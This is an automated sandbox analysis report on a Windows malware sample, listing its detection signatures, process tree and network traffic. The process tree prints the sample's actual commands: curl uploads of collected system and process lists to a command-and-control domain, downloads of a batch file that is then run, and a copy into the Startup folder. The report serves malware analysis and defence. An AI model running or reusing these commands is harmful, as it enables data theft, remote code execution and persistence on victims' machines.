Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1573844
MD5:5950611ed70f90b758610609e2aee8e6
SHA1:798588341c108850c79da309be33495faf2f3246
SHA256:5270c4c6881b7d3ebaea8f51c410bba8689acb67c34f20440527a5f15f3bc1e4
Tags:exeuser-Bitsight
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy itself to suspicious location via type command
Suricata IDS alerts for network traffic
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops PE files to the startup folder
Found API chain indicative of sandbox detection
Gathers system information via systeminfo
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Writes or reads registry keys via WMI
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • file.exe (PID: 4848 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5950611ED70F90B758610609E2AEE8E6)
    • cmd.exe (PID: 4688 cmdline: cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • systeminfo.exe (PID: 6360 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • tasklist.exe (PID: 4308 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • curl.exe (PID: 2212 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 748 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 2668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3780 cmdline: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 2780 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2668 cmdline: cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 6252 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 3836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • file.exe (PID: 6444 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" MD5: 5950611ED70F90B758610609E2AEE8E6)
    • cmd.exe (PID: 4440 cmdline: cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • systeminfo.exe (PID: 4308 cmdline: systeminfo MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
      • tasklist.exe (PID: 6540 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • curl.exe (PID: 3836 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 3620 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 1716 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7080 cmdline: cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • curl.exe (PID: 5464 cmdline: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches

Spreading

barindex
Source: Process startedAuthor: Joe Security: Data: Command: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" , CommandLine: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" , CommandLine|base64offset|contains: rg, Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4848, ParentProcessName: file.exe, ProcessCommandLine: cmd /c type "C:\Users\user\Desktop\file.exe" > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe" , ProcessId: 3780, ProcessName: cmd.exe

System Summary

barindex
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" , CommandLine: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" , CommandLine|base64offset|contains: r, Image: C:\Windows\SysWOW64\curl.exe, NewProcessName: C:\Windows\SysWOW64\curl.exe, OriginalFileName: C:\Windows\SysWOW64\curl.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 4848, ParentProcessName: file.exe, ProcessCommandLine: curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" , ProcessId: 2212, ProcessName: curl.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-12T16:46:14.864811+010020188861A Network Trojan was detected192.168.2.54972094.154.172.218443TCP
2024-12-12T16:46:34.577073+010020188861A Network Trojan was detected192.168.2.54976394.154.172.218443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeReversingLabs: Detection: 28%
Source: file.exeReversingLabs: Detection: 28%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeJoe Sandbox ML: detected
Source: file.exeJoe Sandbox ML: detected
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49725 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49771 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknownHTTPS traffic detected: 94.154.172.218:443 -> 192.168.2.5:49793 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0024D3A9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0024DBBE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021C2A2 FindFirstFileExW,0_2_0021C2A2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_002568EE FindFirstFileW,FindClose,0_2_002568EE
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0025698F
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0024D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0024D076
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00259642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00259642
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0025979D
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00259B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00259B2B
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00255C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00255C97
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_005AD3A9
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,20_2_005ADBBE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_0057C2A2 FindFirstFileExW,20_2_0057C2A2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B68EE FindFirstFileW,FindClose,20_2_005B68EE
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,20_2_005B698F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,20_2_005AD076
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_005B9642
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,20_2_005B979D
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,20_2_005B9B2B
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005B5C97 FindFirstFileW,FindNextFileW,FindClose,20_2_005B5C97
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2018886 - Severity 1 - ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.5:49763 -> 94.154.172.218:443
Source: Network trafficSuricata IDS: 2018886 - Severity 1 - ET MALWARE Windows TaskList Microsoft Windows DOS prompt command exit OUTBOUND : 192.168.2.5:49720 -> 94.154.172.218:443
Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: global trafficHTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 0Content-Length: 17852Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global trafficHTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 1Content-Length: 0Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 0Content-Length: 17774Content-Type: application/x-www-form-urlencoded
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global trafficHTTP traffic detected: POST /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 1Content-Length: 0Content-Type: application/x-www-form-urlencoded
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0025CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0025CE44
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32X-Sec-Id: 3
Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: peerhost59mj7i6macla65r.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80Accept: */*X-Reply: 1X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865X-Auth: 2F414C464F4E532D50432F616C666F6E732F32
Source: global trafficDNS traffic detected: DNS query: peerhost59mj7i6macla65r.com
